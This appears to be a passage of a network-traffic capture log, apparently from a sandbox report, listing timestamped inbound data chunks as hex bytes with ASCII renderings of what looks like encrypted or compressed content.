b4 ab e3 23 d6 a7 a0 4c c9 86 36 f2 64 c1 a7 d4 8d a0 e8 ad ea d7 4d d1 f5 27 c3 52 6c de 49 a8 6e e0 65 a2 59 f8 88 a8 db 1d d8 5f Data Ascii: u` =(7rg%SFWTR:yma0aCA+~yyzq.W1HyD10?_m8Pd[,\7mCg3XZTf:7dBr-7(U%sgUF"KDPVyy24G*Ymu[#L6dM'RlIneY_
2021-10-13 13:51:48 UTC	230	IN	Data Raw: 0e 6f 70 73 d7 7c 7b b9 8f 23 13 d3 d9 70 73 bf 8f 96 e2 dc 41 94 f3 5e 92 90 5c 8f bb 38 b7 02 1a e9 a0 b8 f0 24 fe 75 2f 54 c9 4f 71 04 6e 49 d8 07 2d 88 2f 57 75 ac 28 65 7c aa 45 8e ef 30 5a 88 22 a7 cf 6b fa 02 32 c3 92 1f 3e 28 2a 04 be de ab 2f 68 5a cc dd be 23 40 b5 06 f0 e1 68 20 74 ec f3 57 64 be be c6 ac 86 b6 26 2d 20 df 01 52 e3 32 d3 a1 6e fa b1 d7 80 9d a6 41 dd 7e 2f 03 f6 6a bf 09 d2 93 f5 1d cd e1 3c 71 71 ae b1 97 c9 3b 0d 17 82 83 71 3c e4 00 d7 33 17 7e 8a 20 69 b1 3f 31 69 e9 63 69 d8 71 84 47 63 2a 77 8f 8b 2f 47 fa 8f 6e 6b ef cf d7 dc 35 42 83 70 1a b9 0e 77 3c 9c 2b 36 8c 03 33 9a a5 4e 85 0b b5 17 14 17 50 09 9d db 26 41 dd 60 cb dc 9a f4 70 4c 99 b5 a7 ca ba 1c fc 5f d6 21 3b 82 d5 b6 58 8b 38 ae c8 14 0a 21 2f cd 10 9a f5 aa Data Ascii: ops\|{#psA^\8$u/TOqnI-/Wu(e\|E0Z"k2>(/hZ#@h tWd&- R2nA~/j<qq;q<3~ i?1iciqGcw/Gnk5Bpw<+63NP&A`pL_!;X8!/
2021-10-13 13:51:48 UTC	231	IN	Data Raw: 02 d6 23 5b 7e 64 49 e0 cd 20 89 80 6a 2c 8c 6e 2d 39 b7 b4 ba 0a 85 43 98 79 6c 15 30 ee 06 e0 be 4c dd 8f a8 3b 89 6d e7 19 9a 8b 61 6b 00 d4 da a2 d7 81 ed df 96 3b 98 54 ad a5 41 b1 72 76 a5 42 14 ac 96 f8 aa 9e b3 43 39 d9 7c a9 81 36 44 8d c4 45 37 7e e9 fb df 3b e4 c4 59 05 58 29 f6 dc eb e3 81 f3 7e a7 a1 f5 97 23 0a d1 cc ca 9c 5f d8 ad 19 fd e1 0c d8 51 d2 e7 e2 13 34 ec 58 f8 e8 1e ec f1 6e e2 1b 58 a2 08 da 37 1f 64 cb b2 31 73 26 95 f9 c7 0f dd 78 3c 3f 79 7c 6a 3b b4 38 f2 90 7a cb 0d 4c 6e 0c 02 69 c0 2e 19 3f 0e 35 a6 76 6a 15 e1 6e e3 4a 01 7c 01 4c dd 1b 29 00 41 c3 81 ed a4 53 f8 4b 43 4d db cc 14 59 89 75 44 ad 8a b9 2c d3 2d 12 5a b3 35 2f bc c7 6e 33 6b 4e f0 87 b6 b7 9b 63 da 45 ae 63 91 fa b8 9c 57 bb 45 f2 f3 cf 5c 91 97 8d 50 3a Data Ascii: #[~dI j,n-9Cyl0L;mak;TArvBC9\|6DE7~;YX)~#_Q4XnX7d1s&x<?y\|j;8zLni.?5vjnJ\|L)ASKCMYuD,-Z5/n3kNcEcWE\P:
2021-10-13 13:51:48 UTC	232	IN	Data Raw: d5 35 27 ea cc 9f b2 a5 d8 5c d8 2f 63 0e d0 ba 58 ed 13 ed 50 b4 43 1d 4b c4 a3 51 7b cf 1a 90 9f 0d 92 3e 9b 7a 36 4d b2 ab c0 67 98 18 9a 6b 37 0e 5a ad 29 bf f3 31 35 1b b3 da ae 60 75 25 6b b3 23 61 cb 4f 92 60 8d 38 64 f4 79 01 a1 a3 fc 91 51 8e 0a dc ba c6 f5 9a 0b 0f 84 42 ad 9a aa 95 06 42 d2 a0 36 23 c5 b8 e9 be d5 54 35 64 e5 b0 a0 8b 37 e4 be ca 75 9e 00 7e ad 72 9c 34 b6 a5 d9 64 24 7e 63 a8 45 fa 90 b0 cb c0 34 bd b0 45 bc e3 47 20 aa 1e f0 05 9f b0 e1 2e f5 52 2f 7f 27 7e d6 7c e9 59 10 b2 17 f8 6d f1 74 d7 11 ae 75 2d 1c 5d 9f ab 46 10 69 04 4e 59 32 a9 70 dd a2 d2 22 63 66 93 d6 99 53 29 91 b6 a2 e3 eb 95 2c fe d8 28 01 06 48 57 6b 4a bf 87 a4 fa c1 91 86 f5 bd 37 42 fd 03 e7 b1 4b 16 6c 16 92 b5 59 e1 dd 3f 4e 3d 24 b0 4e 40 2e c9 7a 42 Data Ascii: 5'\/cXPCKQ{>z6Mgk7Z)15`u%k#aO`8dyQBB6#T5d7u~r4d$~cE4EG .R/'~\|Ymtu-]FiNY2p"cfS),(HWkJ7BKlY?N=$N@.zB
2021-10-13 13:51:48 UTC	234	IN	Data Raw: b7 6b a6 56 f2 05 6b ad eb d7 52 39 32 bb b1 48 dc 35 f9 cd 36 ea d8 da ad 86 c6 26 fc 15 a2 cb 97 35 34 93 07 6d 47 3a 2f 02 0e e3 2e a5 4b 2a b1 de 76 64 22 41 46 a9 38 69 d8 6f 87 17 4e 2f d7 77 66 23 3a 2e f6 7b 85 81 43 ff 53 fc 8a cd a9 ab 18 7c de ad d6 c2 bb ec 31 78 27 80 be 3d 7f 5a da fa 59 5d 00 02 52 ec a5 77 4e 3e 28 28 be 5b 18 ee d7 3b 32 d4 dd 56 90 00 5d a1 72 25 38 f6 5c 38 f7 09 ef 08 0b 9e c5 86 96 75 c5 23 3e 2d b6 60 f6 d8 51 5e 6e b2 52 40 e6 3b b9 e7 f8 cd 04 f6 1e f1 bb a0 54 1b 40 0e 6d 97 ca fb 6d ed 1c 25 cf f5 c8 1b 5b 76 6a d7 fb 61 41 1f b9 09 44 c4 3c 91 cd 96 16 32 50 0f af 75 79 0a f8 9c 54 c9 a5 fb 52 60 2e e1 03 14 72 d0 8e 14 d4 70 12 b9 06 2c f4 12 ad ee 3f 42 cc f1 97 a4 f2 70 b5 d0 1f 98 90 06 9c 94 50 30 de 94 ce Data Ascii: kVkR92H56&54mG:/.K*vd"AF8ioN/wf#:.{CS\|1x'=ZY]RwN>(([;2V]r%8\8u#>-`Q^nR@;T@mm%[vjaAD<2PuyTR`.rp,?BpP0
2021-10-13 13:51:48 UTC	235	IN	Data Raw: db eb 6d 20 4e b1 e0 eb f5 c5 03 66 7a c9 8e ca eb 73 fc 25 40 b7 f3 5a d3 12 d7 84 3f ee 22 c6 39 90 bb 8a 76 eb 5d cc 7a c1 f5 4b 53 51 52 17 0a ee d7 a3 2a f7 8e 00 4e b1 aa e3 22 c0 b7 10 76 31 8a b9 cb 31 96 45 c0 f2 21 a3 ad d7 61 a5 ef 4b 02 4a 3f 84 68 6b 09 ac 47 1f ee 45 45 c5 40 1c d7 a5 58 d2 d4 98 2f 53 17 d3 2c b1 71 76 7a b2 52 3a d2 bf 94 ad ae ee f7 3c 56 64 ab b5 db 50 a0 9e c4 4a a9 3a df 05 38 f5 ed de 9e cf 87 0d 86 ea d7 56 49 74 da f3 13 c7 75 14 27 2b b0 77 7c 43 0a 6c b9 bf 32 6d 08 3d c7 36 3d 08 68 99 85 a4 78 84 bc 52 76 b1 bf 9c 36 54 48 7a 9d 87 fb 13 fe f1 72 cd cb 35 2a 2a 0b 61 1b 91 0f 59 0c 34 12 9d 1a 22 d9 dd 76 03 25 1d 32 bb 4d 4d ba 87 d6 55 e3 9d 05 24 c0 c5 3d 4d 62 c1 a8 7e bb 49 3d 44 c7 7b 40 db 47 fa 5c f3 bc Data Ascii: m Nfzs%@Z?"9v]zKSQRN"v11E!aKJ?hkGEE@X/S,qvzR:<VdPJ:8VItu'+w\|Cl2m=6=hxRv6THzr5*aY4"v%2MMU$=Mb~I=D{@G\
2021-10-13 13:51:48 UTC	236	IN	Data Raw: 60 3e 3e 17 55 d5 fe 7c 54 57 41 bb d4 0e a8 74 f5 ea 14 e6 48 58 22 70 bf c3 09 d2 2a 3f 7e 2a 49 bd c9 af a2 c8 45 0a b9 98 cd 10 9a 16 06 31 f3 d1 f3 9f 0a 26 da d5 75 a3 4e 01 11 7f 28 9f c1 ec 4e 53 6e 73 f5 ad 27 b2 c0 b6 be e4 1f 09 d9 0a 60 50 9a da fd 41 1d cc 3b 69 de c4 73 be 35 b3 bd 13 19 d8 ac 94 03 d3 fd 33 a2 fb 7e a2 d1 df 3c 46 08 c9 8a 52 7c e0 26 8e 73 bf 69 e0 67 97 84 71 bb ea 0c bc 66 2d 63 44 8a 94 11 c5 87 a1 c9 ac 12 34 92 04 66 a8 f0 29 30 ad 72 41 34 e4 ca 2a 9b 75 c7 d9 26 a1 fa 13 74 d3 84 89 45 d5 69 8f 31 c9 3e 4b 5b 36 75 98 cc 77 83 35 41 0b eb c0 c6 d2 54 9b 5d 1c 2a 8d 10 dd 0e 8a a5 d2 9a 04 5e 1c f0 4a 87 c1 06 71 a4 93 16 cf 79 36 96 dc 8e 5e 61 0e b8 f3 aa 6b a0 7f cb 2a a8 35 98 9c 74 34 20 80 c2 40 84 fc 0d 5a 89 Data Ascii: `>>U\|TWAtHX"p?~IE1&uN(NSns'`PA;is53~<FR\|&sigqf-cD4f)0rA4u&tEi1>K[6uw5AT]^Jqy6^ak*5t4 @Z
2021-10-13 13:51:48 UTC	238	IN	Data Raw: a5 62 0b fd 4b d3 f5 1f 87 4d fc cb 6e 2d 89 5a 8d 79 b6 1c 5b 03 ae 7c 3e 21 01 b7 62 66 42 3a 88 f7 96 59 a9 15 72 1e 45 3b d8 df bd b7 13 70 9a 48 18 b9 90 c9 15 da 05 0a a8 8e 96 fb f6 95 ae a6 66 64 1e 01 68 b2 44 16 53 46 d3 e6 26 8f 48 32 94 23 65 8c cc 4b e5 c5 e4 ea e6 2d 44 c7 5f fe 98 9f 0a 52 19 bc b3 85 d2 c1 36 92 69 ca 61 be 27 55 f1 5b 87 3d 6e ac 87 e7 78 ef d3 56 82 30 30 cf 24 3c 02 d3 fd ad ee 1b a6 27 63 28 7b d5 2c 5d 6b 17 1d df 27 57 b3 cd 90 3e 73 7f a0 ce d1 95 14 63 49 12 a4 1c 57 2c e6 50 26 2d fb 73 2d b4 b3 bf 6d 28 10 c1 46 03 16 7a 6d 43 54 f8 44 c0 e6 d2 e0 82 13 18 4e cb eb 44 48 3f 1d 1a 08 9d c9 92 e4 43 80 d0 27 59 0c a8 1b 37 15 7e 07 f5 ac c1 6e 33 c5 46 bb 92 15 09 d7 45 74 7e 5c f4 69 47 6f 10 fa 7b e7 62 43 c5 23 Data Ascii: bKMn-Zy[\|>!bfB:YrE;pHfdhDSF&H2#eK-D_R6ia'U[=nxV00$<'c({,]k'W>scIW,P&-s-m(FzmCTDNDH?C'Y7~n3FEt~\iGo{bC#
2021-10-13 13:51:48 UTC	239	IN	Data Raw: 7b 1e c0 f4 41 2c 88 53 40 69 3c 69 7f ef 2f 66 a9 b9 d6 78 bd 8b f7 51 ac e4 3f 9b 28 6b 14 ee 8e f5 6e c5 4a 48 e0 bb 37 43 70 02 9e 29 21 c8 cf cb f6 b5 19 45 65 e9 69 11 19 d1 df 0a 25 a9 93 72 4c 16 46 9e 81 5d 2d 2e 40 d2 b3 8f 44 35 79 0a 84 6e f2 2a a5 de 02 4a 3f c1 c0 74 a8 3c d4 5a ea 59 ff 0b 3e 58 0c e2 a4 f7 6e 27 0c d3 10 af 39 43 47 74 39 e4 c0 39 7c 5b 15 e7 d2 1b 22 46 7f da 34 0e 85 d2 68 c3 c4 ac 7b 97 ef 57 62 bf 39 27 a3 2d 53 3f ba 55 72 7a 63 c1 6a 5b db 7a fc b7 e4 cd 0e 24 ff 96 80 53 70 7b fc c0 44 52 d5 e9 e6 d7 d3 be 6a fb 1a 2d 9f 00 62 e0 fc 33 50 38 43 0b 6c 32 c2 b1 71 0c ef d9 7c 8e b6 54 1a 41 e8 74 f3 81 75 29 ef d3 02 5e c9 d0 7a 76 b0 38 f2 e0 f2 49 9a 72 18 45 6b a5 e2 df 1e 48 3f 99 f4 1e 9b 12 09 d1 56 41 d9 2d 6d Data Ascii: {A,S@i<i/fxQ?(knJH7Cp)!Eei%rLF]-.@D5yn*J?t<ZY>Xn'9CGt99\|["F4h{Wb9'-S?Urzcj[z$Sp{DRj-b3P8Cl2q\|TAtu)^zv8IrEkH?VA-m
2021-10-13 13:51:48 UTC	240	IN	Data Raw: d6 9c a6 39 a6 02 02 12 1f d7 ef 9f b4 04 56 07 9f ab a9 f2 70 b3 c4 b0 11 ee b2 88 7e 6e 2f e7 d4 5d d6 9e ae 92 90 8d 0e df 61 49 8f 37 43 3e 12 2a 2f 20 a5 ab a7 ca 66 3b d3 82 0a ab 68 c0 dd e7 82 67 fc 4a fe e8 1d 7a d2 09 58 9c 2e da 0a 71 9f 98 10 19 cf 98 87 23 c0 1c ab d5 77 20 c1 12 92 1a 52 c1 64 a0 33 97 39 06 7a c8 37 0f 45 16 27 53 1a 0f 5f f7 f3 c3 44 b7 2c 18 64 07 a4 3a fd 44 29 86 41 89 80 cc 32 df b9 ae ad 06 7a d7 ef 44 55 87 cb 57 e7 98 4b ea b1 a7 11 75 07 e7 c6 32 3e 15 d1 37 fa 8a 20 3b f9 00 9b 54 35 a1 9a 64 29 09 8a bd 8b 36 8c 18 67 30 79 1d cc df 38 f6 90 bc 4d 2f c8 ed 66 bf 4c d5 cb 74 71 92 e6 a4 92 e3 c6 b7 18 5b 14 e0 67 5a 25 68 f9 e8 b3 ee 08 aa a0 ee d5 85 b1 55 c8 55 64 ed ce 95 ce 03 3e 28 a6 67 95 2a 83 9d 07 1e dd Data Ascii: 9Vp~n/]aI7C>/ f;hgJzX.q#w Rd39z7E'S_D,d:D)A2zDUWKu2>7 ;T5d)6g0y8M/fLtq[gZ%hUUd>(g
2021-10-13 13:51:48 UTC	241	IN	Data Raw: a3 45 89 f4 02 97 92 77 c5 06 dd fe 1a 13 58 36 64 4d b8 89 53 8d e3 41 1d d0 b3 99 05 fa e1 05 33 89 29 49 3d 3e 59 e6 41 de 97 94 c3 6d fc 7f db cb f1 4e 24 48 ef 94 b8 3e 21 ea 6a 78 0e 43 e1 88 e2 97 f4 01 97 8c 88 52 27 9d 1b ad b1 17 7b 93 0f 5d f9 6d bd bf 74 de a7 9e 1f 01 04 9e 95 23 b5 8c 35 1e c1 dc 1e e9 be ea e6 74 2e 26 0c e6 2e 9c a6 90 90 ca 83 59 68 4c fd fb eb 44 c7 d4 e1 f2 9d 09 da a0 aa ad d7 5f 28 5e 1b fc 8a ce a9 99 b3 7c de 94 97 79 99 23 f0 87 a4 17 4a 6d f0 55 5e 29 b1 42 2e 89 17 b3 1e 1e 4f d6 ec 81 a9 17 9a 2a db 37 84 c1 dd 56 90 53 ee 8d 96 78 fb 2e f9 65 a7 5e 07 00 79 05 c4 05 52 2e 72 28 8f 2c b6 e3 32 bb e3 08 63 7a d9 15 6e 61 d7 bc ba 5d 04 f6 e9 25 8a 90 67 0c 40 7a 23 e1 f3 1f 79 a5 f2 da 45 62 87 88 06 b1 1e fc 4b Data Ascii: EwX6dMSA3)I=>YAmN$H>!jxCR'{]mt#5t.&.YhLD_(^\|y#JmU^)B.O*7VSx.e^yR.r(,2czna]%g@z#yEbK
2021-10-13 13:51:48 UTC	242	IN	Data Raw: 4c 91 4b 10 ba a3 44 17 f6 3d 2d 13 ad cc 22 27 7b 77 f3 fc 47 6c e5 3e 84 6c ef dd de 2f 09 31 22 68 1a 41 6b 39 40 af dc 3d a9 d2 01 ae ce f3 64 ce 77 ad 2c 6d 4e 4e 46 ef 6a 95 3d 4d d3 af 12 cb 42 49 a4 3c 97 78 c6 c5 56 be 42 a2 79 58 eb 71 a1 e5 b2 16 5d e5 24 c5 78 e2 71 b6 30 f1 86 74 51 0f 4f 81 0d a0 e5 6b 9d 7a f2 a1 f2 0b 16 89 23 f9 fd e3 0b 52 f4 b8 3e 21 01 b7 7e 6a ca bb 43 dd 6b f1 00 97 b9 fa ad d8 9d 1b b1 6b 89 29 d4 10 08 72 81 b5 06 98 00 d1 ba 19 3e 8f e1 99 aa a6 15 bc d6 7b a1 0a 40 61 47 51 89 2a ab ca da 62 2a bd b2 ba 86 83 55 02 3b 9d 01 83 22 00 1a 57 f3 1c d7 8f 0b 41 4d 34 d2 ab bd 52 e4 d9 cf 16 30 2c c9 de c7 93 1c 06 27 5d 2f cf f3 e3 e8 30 d1 9f b9 32 86 0a 82 2f ab 4c c3 68 37 5d 78 db 98 1b 65 8a 60 50 7d c2 6a b0 25 Data Ascii: LKD=-"'{wGl>l/1"hAk9@=dw,mNNFj=MBI<xVByXq]$xq0tQOkz#R>!~jCkk)r>{@aGQbU;"WAM4R0,']/02/Lh7]xe`P}j%
2021-10-13 13:51:48 UTC	243	IN	Data Raw: 38 12 5f 2e 29 9e 08 28 03 36 fe 18 a0 b3 e8 8e ce 7f bd 5d 28 9b db 2f 4c a2 0c fa 90 d8 c8 06 71 55 2e c9 cd 1d 50 48 b5 1e a1 48 e2 43 db f1 8f ad b3 53 e0 1a 29 20 39 00 c7 20 ca 6d d5 34 e1 29 14 11 38 24 97 5d e3 90 0b 98 ed 34 d7 57 af 0b 4c b5 52 1f d5 09 7b 3e 8f 55 c4 b7 81 46 aa 21 fb 9a 49 3a bc a9 46 8a c1 44 ac be 3a 7b f2 99 b2 e2 11 3d a8 ba d0 70 98 3e 92 5e 1a d1 76 e4 0f 10 62 40 9a c7 fb 49 35 e3 80 a7 40 3f 78 85 4b 78 31 79 e8 19 a7 fd 5a d4 0c e4 20 01 4e c6 54 64 a7 8b e8 54 81 d4 e3 bb c5 fd 77 8b 9f 95 f4 4f 48 5e 8c fa 62 9b 85 4d 16 18 7f e5 85 ec 84 3b 71 2b fb 4e e2 78 e8 ed c8 f2 6d 8f d5 c1 19 a5 c6 59 31 b8 96 65 ef d4 97 57 50 e9 a5 a1 81 fd 23 7e f6 0e ef 5f 8f 2a 6a 04 0f 34 56 18 33 7a 39 a4 ea 80 26 87 b1 2f d6 f8 b8 Data Ascii: 8_.)(6](/LqU.PHHCS) 9 m4)8$]4WLR{>UF!I:FD:{=p>^vb@I5@?xKx1yZ NTdTwOH^bM;q+NxmY1eWP#~_*j4V3z9&/
2021-10-13 13:51:48 UTC	245	IN	Data Raw: 11 e7 13 96 e4 11 28 1c c7 1f e5 0b 50 27 a2 8b fe a5 c5 5a 4b c8 1e a0 45 5b e3 86 00 82 f0 af b1 33 b7 d0 49 1c 58 e0 e5 b8 fe eb df c5 12 ce 7f ab a8 2f f8 5d 6a e1 b1 d3 72 11 cd 43 99 da a3 c5 04 64 e1 da 45 b3 15 47 c6 f1 2b d7 a3 bf f2 50 fa e9 70 8b 3c 56 89 1e 63 32 61 51 33 6d 36 e8 d5 b1 f4 ae 6a d7 61 fa 0f 6a 28 da ab bb dd 42 83 72 2a 29 04 f6 b0 9c e8 4e 3b 46 97 fb 2a 1f 0c 4e 92 de 52 22 19 43 ad dd 61 f9 54 18 ff bc 3c 7d 7f c8 9e 73 87 95 b3 2d 48 ec 02 64 58 2f 42 ee 80 be 40 23 24 1c e0 85 51 9b 23 d1 0b 08 59 f2 5c 36 ce 7c 23 d8 78 dc 1a a2 a1 94 87 58 e5 e2 ff 3a 0b 3e 9b a0 23 3b 31 87 7e 19 9f e6 16 2a bb 53 99 cb dc fd a1 11 45 e5 a1 9d c7 71 be 98 6e d0 85 49 27 53 49 66 00 cd cc 5d c0 96 e1 f5 03 c7 3a 33 88 ba 39 2c 58 2f 8c Data Ascii: (P'ZKE[3IX/]jrCdEG+Pp<Vc2aQ3m6jaj(Br)N;FNR"CaT<}s-HdX/B@#$Q#Y\6\|#xX:>#;1~*SEqnI'SIf]:39,X/
2021-10-13 13:51:48 UTC	246	IN	Data Raw: ed 9e cc 9b 27 2e 33 21 c6 4f aa 20 9d 3c 50 7c 33 8f 92 eb 4c c0 09 4a 22 27 9e 03 52 f5 e9 61 7c 6a ed 0d ed 26 bd 5e 17 97 5c 91 19 ad 75 96 df b4 88 8f 52 41 60 6c bf 47 38 f8 f7 95 7f 84 06 18 9a e5 be b9 ab ac a9 a9 d6 10 0f 98 29 63 89 9b 93 60 6e 7b 19 5d e7 9f 17 e7 ea 93 5a 9e 4b 44 23 04 75 0b 95 15 93 1d c5 db b8 05 51 ec a7 ea aa dc f0 f0 e9 a2 e1 9a ba e1 1e 8e c2 27 e3 6f b0 c0 ec ce 02 b4 a1 e9 92 08 2c 8b 61 51 2e 52 37 de 78 b6 1c 61 e9 c2 b8 b3 b4 80 8c 85 f3 11 3a 80 97 9d 59 a9 2f 37 a7 50 23 e1 20 3e f0 87 1e 15 b6 5d 74 e0 34 15 77 ac b3 f7 da 51 f8 63 6a 71 b5 0e d6 68 73 d7 c2 3e d1 fe 51 1c 7e ce 59 86 32 19 e5 21 c4 27 45 19 7d 2d e9 a3 8e 6d b3 58 9c 3e 48 d4 37 ac 6a f6 08 ea 57 c9 e0 ad 62 2b e5 d8 07 4f 0c ad c2 c3 35 5e 9b Data Ascii: '.3!O <P\|3LJ"'Ra\|j&^\uRA`lG8)c`n{]ZKD#uQ'o,aQ.R7xa:Y/7P# >]t4wQcjqhs>Q~Y2!'E}-mX>H7jWb+O5^
2021-10-13 13:51:48 UTC	247	IN	Data Raw: 7e a2 08 03 c5 eb 7a dd 34 ea 1d 53 f9 20 18 ea ec 6d f2 c0 3a 9e c7 46 c0 3c 9e 3b 44 b4 df 09 d9 97 05 cd e4 29 ce 42 29 fb 34 ae 95 ed bd fc ff 9a f9 6a da c8 59 00 3f a4 ed d4 e4 1d f5 63 57 99 1b 03 44 bc 6e e3 b7 dd 4f 7d db cf 61 a8 48 30 fd b3 2a d0 1a 29 28 a0 1c 9e e4 2b 05 50 2a eb 79 10 ae 64 3b 1c 5d 76 6b 20 ef 03 cd 90 d2 d7 f4 e1 1d cf fb 3b f6 0d d1 f7 c0 1f c9 ce a3 2a a8 be 48 97 97 4d ba fc f9 cb c5 0c 26 c7 ee a2 f8 c1 cf 5d 9d 6d 0e af 75 43 eb 98 4a f7 bc ec 39 14 e4 60 e9 be a2 12 e2 bc a6 1e 01 a1 7c cb 0d 0e 9b 7b b1 0a b4 17 52 38 d4 0c a0 62 62 2d a9 f5 a8 9e aa 7b df 7e b5 f3 e6 4c b8 80 cb b0 67 2c 87 11 b5 36 d5 5a 8c 96 98 05 b7 b3 dd cd 34 de 5a 64 d1 b1 6b c1 f0 78 77 9f e7 28 6f 6f 44 9e a5 c6 54 31 b8 95 65 ef d7 78 9b Data Ascii: ~z4S m:F<;D)B)4jY?cWDnO}aH0)(+Pyd;]vk ;*HM&]muCJ9`\|{R8bb-{~Lg,6Z4Zdkxw(ooDT1ex
2021-10-13 13:51:48 UTC	248	IN	Data Raw: 03 75 9e 34 cc 6d 7c b4 c4 4d 14 5b 2e f0 87 77 84 be 8e a6 a5 25 2a 75 52 44 03 df 32 45 b7 e7 c1 42 58 07 00 4a 75 d7 68 59 bd d8 db 04 16 bd ff 8c da 6a f2 5c db 60 f6 10 31 e3 6f d1 0b 13 2e d4 89 c8 7d e1 0b c3 d1 68 ed bd 7d 72 b7 4a 28 40 a3 20 4e 83 a6 61 e1 82 67 15 93 ff 0e 13 8b f3 48 e4 e0 99 d3 cf d5 1c b3 43 2f e1 32 9d 7c 08 31 6e 8a 70 91 19 fb cc 1b 9b 3a f6 ae 0b 79 ed 74 20 8b f4 69 ac 83 1e 73 fc 26 e4 9f 3f 59 1d 36 56 78 d0 4d 84 b3 2c 15 46 28 31 7d 3f 72 3c 3a db 07 31 d2 ac 92 90 06 2a 86 4c 47 df 5d 43 06 9f f9 7d 3f e2 48 f7 ac 64 e3 c3 fe a0 58 0b c3 4d b6 d5 5d af a3 c8 14 6f 08 58 30 ef ee 09 0e 0a 34 d9 6e be 0e 26 25 6f 0f d3 c4 28 7b 40 28 4f ac 7d b1 fe f8 de 9b 66 cf a9 db 72 9a ea a2 a9 c5 2a 03 71 3b f4 a8 ad 11 45 dd Data Ascii: u4m\|M[.w%uRD2EBXJuhYj\`1o.}h}rJ(@ NagHC/2\|1np:yt is&?Y6VxM,F(1}?r<:1LG]C}?HdXM]oX04n&%o({@(O}fr*q;E
2021-10-13 13:51:48 UTC	250	IN	Data Raw: 36 84 92 28 0e 22 4c fc 7f ec f9 6e 19 8d 84 e7 d2 8e 72 98 d1 13 a6 5d 6d e8 72 3f 39 00 09 49 4e 44 89 85 68 70 c6 11 5d 3d ba 27 b5 07 c7 22 c6 e0 8d 2b df d1 67 09 c1 3f 05 9b 09 52 76 7f b9 79 8a 1d 5d 63 6b 27 ad be e1 8b 66 c1 28 b5 71 a2 c6 77 70 38 c8 5f 9c 62 4f 7f fb 58 e1 a9 b5 8a 08 68 70 be 65 73 ec c9 55 29 be de a3 bd 8c 4b fe 16 76 fb 79 e6 29 55 31 11 f4 7a 6a a5 61 4a ed 19 c2 71 90 65 fa 17 77 c5 56 b8 a3 8a 13 58 bb 27 c2 ad f8 9d d3 73 cd 52 cc 88 71 6d b2 30 8e e5 b1 03 cd 74 0e aa 32 99 45 1d 71 9e fc 80 d4 54 86 78 c2 75 cf ea a8 b8 54 23 d3 f8 a2 f3 91 3c 8b 7f 6a a6 56 f6 24 b7 26 9d e2 b5 bf 64 28 a5 97 e7 5d 8d 44 bd bf 84 d8 6c b6 4e 69 04 ce 1e 76 1b b7 64 18 c9 dc 1d e8 b9 8f e0 eb 7f ab 19 d6 3b 19 66 b7 8b a9 03 5d c7 e4 Data Ascii: 6("Lnr]mr?9INDhp]='"+g?Rvy]ck'f(qwp8_bOXhpesU)Kvy)U1zjaJqewVX'sRqm0t2EqTxuT#<jV$&d(]DlNivd;f]
2021-10-13 13:51:48 UTC	251	IN	Data Raw: 37 6c 5c a7 76 d8 11 4b 5c a8 ad f6 d0 77 d2 e7 c0 de 10 8f aa 3b 30 1d a4 97 94 b4 a6 88 32 a2 91 7e 74 d7 e6 9a 7a a8 c6 ef 7a cb 96 3c 2c 33 0a 11 b3 85 e9 d3 2c 36 98 ba 4c 51 78 ba 40 d1 b0 31 96 bb f7 cf 54 da 44 22 ef 5e fe 18 a0 85 9e a9 a6 b8 6b 62 58 21 dc 7f 2d b0 59 73 cd 4c 34 d6 fa 10 5b cf f3 e7 22 e2 23 4c a3 dd 0f 37 a5 0e 70 fd a4 b7 c6 6f 25 f8 32 e4 38 70 41 10 56 6b 08 ec 43 cb ab a1 e1 29 59 93 18 ad de a4 c1 57 17 fb 37 f3 27 71 a1 82 bf 47 a0 27 6e bc 5a 88 7d a4 33 5b 20 2f 5e 22 52 c1 0d f5 28 79 7f ef 5d 2a 44 51 d9 fc bd cd bf 02 77 c3 c7 f0 48 a7 14 e7 06 8c 0b 8f fe 6a 4e e2 65 9a 8d ce 7f bb 42 dd 7d c3 37 d6 58 c9 2a 9d 82 15 88 b6 65 e2 ef 9e 13 c0 14 da 89 a0 78 57 d5 7f 48 88 58 00 de 6a 72 bc 4e d8 7f fa c3 57 5f 7b d0 Data Ascii: 7l\vK\w;02~tzz<,3,6LQx@1TD"^kbX!-YsL4["#L7po%28pAVkC)YW7'qG'nZ}3[ /^"R(y]DQwHjNeB}7XexWHXjrNW_{
2021-10-13 13:51:48 UTC	252	IN	Data Raw: b5 53 b3 b4 67 92 8a 66 30 15 95 f3 b3 6e 05 d7 37 58 90 6c 74 ad 9f 02 2e c2 56 84 55 5f fe ca 4d 77 dc ba cc 9d e3 2c b4 c6 93 1c 1e 03 5e bf 62 07 16 a2 07 66 1d ec 69 a6 94 cd 43 78 08 92 a7 43 28 d1 91 ad f9 ee be 2e 34 be 99 b2 81 8f 15 a9 b4 60 d0 b6 77 49 e7 ce aa b7 60 1f c4 46 51 63 dd 39 e2 83 8e 1c e0 65 a8 e2 b6 37 52 40 92 b8 c5 a8 73 cf 89 a3 92 b3 d2 98 59 0c bf de 9c 4b 8b 38 1a a1 e4 ae b2 6c 16 74 d1 fc 3f 7b 92 d5 34 45 f5 cb 7c 1b ec 14 0c e3 5f b9 4a e1 cf eb ce a6 bf a0 a4 81 a7 ca 12 fa f8 ae e7 a4 fc a8 d8 71 4a 9d e6 b9 06 e6 9c 47 45 9d 39 03 33 f9 22 07 0e 5e 32 dc e7 1f 94 30 49 05 a9 45 a7 0d ab 39 9a 7c 7f 4b d9 a7 2a b6 da 77 42 f6 5f 07 ec 85 a7 28 5e 70 54 29 c0 9f b3 8d 01 32 c2 9a 16 1e d0 b7 a0 ed 4b 7a 88 2d d7 dc 99 Data Ascii: Sgf0n7Xlt.VU_Mw,^bfiCxC(.4`wI`FQc9e7R@sYK8lt?{4E\|_JqJGE93"^20IE9\|K*wB_(^pT)2Kz-
